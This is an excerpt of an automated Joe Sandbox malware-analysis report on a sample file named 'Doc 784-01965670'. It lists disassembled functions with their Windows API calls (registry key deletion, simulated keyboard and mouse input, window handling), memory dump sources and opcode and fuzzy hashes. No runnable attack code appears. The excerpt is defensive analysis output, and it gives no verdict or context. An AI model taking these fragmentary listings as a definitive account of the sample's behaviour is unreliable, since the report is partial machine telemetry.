                                                                                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4166825349-0
                                                                                                                                    • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                    • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                                    • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                    • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                                    Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                                    • API String ID: 2574300362-3261711971
                                                                                                                                    • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                    • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                                    • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                    • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                                    Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                    • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                    • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                    • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                    Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                                    • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3220332590-0
                                                                                                                                    • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                    • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                                    • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                    • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                                    Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1612042205-0
                                                                                                                                    • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                                                                    • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                                    • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                                                                    • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                    Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                    • SendInput.USER32 ref: 0044C6E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2221674350-0
                                                                                                                                    • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                    • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                    • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                    • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                    Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$_wcscat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2037614760-0
                                                                                                                                    • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                                                    • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                    • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                                                    • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                    Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4189319755-0
                                                                                                                                    • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                    • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                    • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                    • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                                    Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726766782-0
                                                                                                                                    • Opcode ID: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                                    • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                    • Opcode Fuzzy Hash: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                                                    • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                    Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                                    • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                    • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                    • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                                    • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                    • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                                    Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                                    • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1976402638-0
                                                                                                                                    • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                    • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                    • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                    • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                    Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                      • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                    • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                    • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                    • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                    • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                    • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                    • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                    Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1871949834-0
                                                                                                                                    • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                    • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                                    • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                    • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                                    Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0044961A
                                                                                                                                    • SendMessageW.USER32 ref: 0044964A
                                                                                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                    • _wcslen.LIBCMT ref: 004496BA
                                                                                                                                    • _wcslen.LIBCMT ref: 004496C7
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1624073603-0
                                                                                                                                    • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                    • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                                    • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                    • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                                    Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
